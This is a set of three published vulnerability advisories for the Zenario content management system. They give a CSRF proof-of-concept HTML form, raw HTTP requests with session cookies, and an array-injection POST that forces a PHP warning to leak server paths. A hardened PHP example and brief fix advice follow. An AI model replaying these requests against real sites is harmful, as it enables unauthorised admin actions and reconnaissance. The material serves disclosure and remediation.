---------------------------
# Exploit Title: Zenar Content Management System - Cross-Site Request Forgery ( CSRF )
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail Tasdelen
# Tested Website: http://demo.zenar.io
# Date: 2018-05-21
# Category: Web Application

# POC :

# GET Request :

Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0
Request Method: GET
Status Code: 200 OK
Remote Address: 213.146.173.88:80
Referrer Policy: no-referrer-when-downgrade
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
X-Requested-With: XMLHttpRequest

# Query String Parameters :

path: zenario__content/panels/content
skinId:
refinerId: html
refinerName: content_type
refiner__content_type: html
_limit: 50
_start: 0
_item: html_10
_sort_col: first_created_datetime
_sort_desc: 0

# CSRF HTML :

<html><head>
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>
</head><body>
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">
<input type="text" name="html_" value="10" /><br />
<input type='submit' value='Go!' />
</form>
</body></html>

---------------------------
# Exploit Title: Zenar Content Management System - Disclosure Sensitive Data
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail Tasdelen
# Tested Website: http://demo.zenar.io
# Date: 2018-05-22
# Category: Web Application

# POC :

Description :

This page contains an error/warning message that may disclose sensitive information.
The message can also contain the location of the file that produced the unhandled exception.
This may be a false positive if the error message is found in documentation pages.

Parameters : /zenario/admin/welcome.ajax.php

Example : http://localhost/zenario/admin/welcome.ajax.php

Attack details :

URL encoded POST input _box was set to %7B%22tab%22%3A%22login%22%2C%22tabs%22%3A%7B%22login%22%3A%7B%22edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22reset%22%3A%7B%22_was_hidden_before%22%3Atrue%7D%2C%22description%22%3A%7B%7D%2C%22username%22%3A%7B%22current_value%22%3A%22e%22%7D%2C%22password%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22remember_me%22%3A%7B%22current_value%22%3Afalse%7D%2C%22login%22%3A%7B%22pressed%22%3Afalse%7D%2C%22forgot%22%3A%7B%22pressed%22%3Atrue%7D%2C%22previous%22%3A%7B%22pressed%22%3Afalse%7D%7D%7D%2C%22forgot%22%3A%7B%22edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22description%22%3A%7B%7D%2C%22email%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22previous%22%3A%7B%7D%2C%22reset%22%3A%7B%7D%7D%7D%7D%2C%22path%22%3A%22login%22%7D

Error message found:

<b>Warning</b>: json_decode() expects parameter 1 to be string, array given in <b>/var/www/zenario-source/Zenario-8.1/zenario/admin/welcome.ajax.php</b> on line <b>82</b><br />

Request :

POST /zenario/admin/welcome.ajax.php?get=[]&task= HTTP/1.1
Content-Length: 782
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.zenar.io:80/zenario/admin/organizer.php?fromCID=1&fromCType=html
Cookie: PHPSESSID=j1n5kr9af7k6iqcdmbq1pgudp4
Host: demo.zenar.io
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*

_box[]=%7B%22tab%22%3A%22login%22%2C%22tabs%22%3A%7B%22login%22%3A%7B%22edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22reset%22%3A%7B%22_was_hidden_before%22%3Atrue%7D%2C%22description%22%3A%7B%7D%2C%22username%22%3A%7B%22current_value%22%3A%22e%22%7D%2C%22password%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22remember_me%22%3A%7B%22current_value%22%3Afalse%7D%2C%22login%22%3A%7B%22pressed%22%3Afalse%7D%2C%22forgot%22%3A%7B%22pressed%22%3Atrue%7D%2C%22previous%22%3A%7B%22pressed%22%3Afalse%7D%7D%7D%2C%22forgot%22%3A%7B%22edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22description%22%3A%7B%7D%2C%22email%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22previous%22%3A%7B%7D%2C%22reset%22%3A%7B%7D%7D%7D%7D%2C%22path%22%3A%22login%22%7D&_validate=true

Response :

HTTP/1.1 200 OK
Date: Mon, 21 May 2018 20:52:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=j1n5kr9af7k6iqcdmbq1pgudp4; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2568
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
Original-Content-Encoding: gzip

The impact of this vulnerability :

The error messages may disclose sensitive information. This information can be used to launch further attacks.

How to fix this vulnerability :

Review the source code for this script.
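The warning quoted above appears because a field named `_box[]` makes PHP deliver `$_POST['_box']` as an array, which json_decode() rejects, and with display_errors enabled the warning, including the script's filesystem path, is written into the HTTP response. The PHP below is an added example, not Zenario's code, showing that vulnerable pattern beside a hardened handler; the function names and the constructed request arrays are assumptions.

```php
<?php
// Added example (not Zenario's own code). PHP parses a form field named
// "_box[]" into an array, so a body of "_box[]=%7B...%7D" arrives in
// $_POST as ['_box' => ['{...}']]. Handing that to json_decode() produces
// the warning quoted in the advisory on PHP 7.x (PHP 8 throws a TypeError
// instead); with display_errors on, the warning and full script path are
// emitted into the response body.

/** Vulnerable pattern: assumes the request field is a string. */
function decode_box_unsafe(array $post)
{
    // With _box[]=... this receives an array, not a string, and PHP 7 warns:
    // "json_decode() expects parameter 1 to be string, array given"
    return json_decode($post['_box'] ?? '', true);
}

/** Hardened pattern: check type and syntax, fail closed, keep internals out of the response. */
function decode_box_safe(array $post): array
{
    $raw = $post['_box'] ?? null;
    if (!is_string($raw)) {
        // Reject non-string input explicitly instead of letting PHP warn.
        throw new InvalidArgumentException('_box must be a JSON string');
    }
    // Size and depth limits bound the cost of hostile input.
    if (strlen($raw) > 65536) {
        throw new InvalidArgumentException('_box too large');
    }
    $decoded = json_decode($raw, true, 32);
    if (json_last_error() !== JSON_ERROR_NONE || !is_array($decoded)) {
        throw new InvalidArgumentException('_box is not a JSON object');
    }
    return $decoded;
}

/** Map validation failures to a generic client error; details go to the server log only. */
function handle_request(array $post): array
{
    try {
        $box = decode_box_safe($post);
        return [
            'status' => 200,
            'body'   => json_encode(['ok' => true, 'tab' => $box['tab'] ?? null]),
        ];
    } catch (InvalidArgumentException $e) {
        // Server-side log line, never echoed to the client.
        error_log('welcome.ajax.php rejected _box: ' . $e->getMessage());
        return ['status' => 400, 'body' => json_encode(['error' => 'Bad request'])];
    }
}

// Production error handling: warnings go to the log, not into responses.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Constructed inputs: the array form the advisory's request uses, and a plain string form.
$array_form  = ['_box' => ['{"tab":"login","path":"login"}'], '_validate' => 'true'];
$string_form = ['_box' => '{"tab":"login","path":"login"}', '_validate' => 'true'];

foreach (['array form' => $array_form, 'string form' => $string_form] as $label => $post) {
    $response = handle_request($post);
    echo $label, ': HTTP ', $response['status'], ' ', $response['body'], PHP_EOL;
}
```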

---------------------------
# Exploit Title: Zenar Content Management System - Disclosure Username/Password Sensitive Data
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail Tasdelen
# Tested Website: http://demo.zenar.io
# Date: 2018-05-22
# Category: Web Application

# POC :

Description :

A username and/or password was found in this file. This information could be sensitive.

Example : http://localhost/zenario/admin/welcome.ajax.php

# DATA :

The impact of this vulnerability : Possible sensitive information disclosure.

How to fix this vulnerability : Remove this file from your website or change its permissions to remove access.

# Want to follow my activity?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln